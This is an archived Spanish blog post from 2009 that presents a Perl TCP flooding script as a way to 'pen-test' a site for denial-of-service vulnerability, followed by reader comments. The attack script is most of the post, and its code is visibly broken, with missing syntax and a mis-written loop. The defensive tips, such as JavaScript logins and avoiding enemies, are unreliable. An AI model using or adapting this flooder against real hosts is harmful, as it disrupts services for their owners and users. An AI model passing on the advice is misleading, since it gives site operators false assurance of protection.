BackUp SeguridadBlanca

Backup Oficial de SeguridadBlanca.Org

jueves, 11 de junio de 2009

Pen-Test Denial Of Service

El Denial Of Service es un Ataque mas que popular todos en sus Pcs tienen una Tool de D.O.S y bueno, la cosa es que con este ataque te pueden perjudicar muchisimo entonces una manera de ver si nuestra web es vulnerable pues es ejecutando el siguente code y si ponen 1000 sockets o 2000 y cuando quieren entrar a la web les sale como que no existe pues entonces son vulnerables a ataques D.O.S

¿en que consiste el ataque D.O.S?
- Para los que no saben es una denegación de servicio hace muchas peticiones hasta que el host no responda y aparesca como que no existe.

use IO:Socket 
  
#Simple TCP Flooder 
#Mi proposito es solo enseñar... 
#Dédalo --> entren a www.seguridadblanca.blogspot.com 
#Programa hecho por Dédalo 
  
print "Introduzca el host: \n"
  
$host=<STDIN>; 
  
chomp($host); 
  
print "Introduzca el puerto: \n"
  
$puerto=<STDIN>; 
  
chomp($puerto); 
  
print "Número de paquetes: \n"
  
$sock=<STDIN>; 
  
chomp($sock); 
  
  
  
for($i=0;$i<$sock;$sock++) 
  

  
  
  
   $hechoIO::Socket::INET->new(Proto=>"TCP",PeerAddr=> "$host"PeerPort=> $puerto) || print "Sus Peticiones han sido enviadas\n"
  
   print $hecho $port
  

  
print "Hecho por Dedalo\n"
print "www.dragonjar.org\n"
print "mail camilo.galdos[at]dragonjar.org\n";  

Si es que son vulnerables pues les puedo dar unos consejitos para no ser atacados asi:

1.- pongan logins con javascript antes de entrar a sus webs.
2.- Configuren Bien sus htaccess, Como Configurar Aquí

3.- Comprense host de calidad no de esos que caen con cualquier cosa =)
4.- No consigan enemigos...

Esas son mis recomendaciones y es lo que les puedo decir de como evitarlos =)


Saludos
Dr.White

Publicado por en
Etiquetas: ,

4 comentarios:

  1. Jbyte11 de junio de 2009, 20:29

    Creo que no hay solucion a los ataques de DOS la unica cosa que puede ayudar es un constante monitore del servidor.

    ResponderEliminar
  2. Dr.White12 de junio de 2009, 19:15

    estoy en desacuerdo Jbyte ya que si hay metodos de evitar este ataque como te digo o protegiendo tu directorio =) con password sino me equivoco asi tambien lo puedes hacer =) masomenos como dije con los logins de javascript un ejemplo sería www.remoteexecution.com.ar esa web tiene el sistema que te digo =) y si el monitoreo sirve...


    saludos
    Dr.White

    ResponderEliminar
  3. Jbyte17 de junio de 2009, 21:37

    Supongamos que tiene una web con ese sistema de login que dice que proteje de DOS pero en si el sistema de login esta corriendo en el servidor de la web entonces al acceder al login ya estaria accediendo al servidor de la web por lo cual podria hacer un DOS ya que el como dije el login que protege contra DOS estaria corriendo en el servidor de la web y seria mas que suficiente para hacer el DOS

    ResponderEliminar
  4. Dr.White18 de junio de 2009, 13:52

    en realidad no se les puede votar asi nomas tendrias que tener un DOSER configurable de puertos para el 21 u otro que tenga abierto ya que por el 80 no se completarian las peticiones...

    Saludos
    Dr.White

    ResponderEliminar

Suscribirse a: Enviar comentarios (Atom)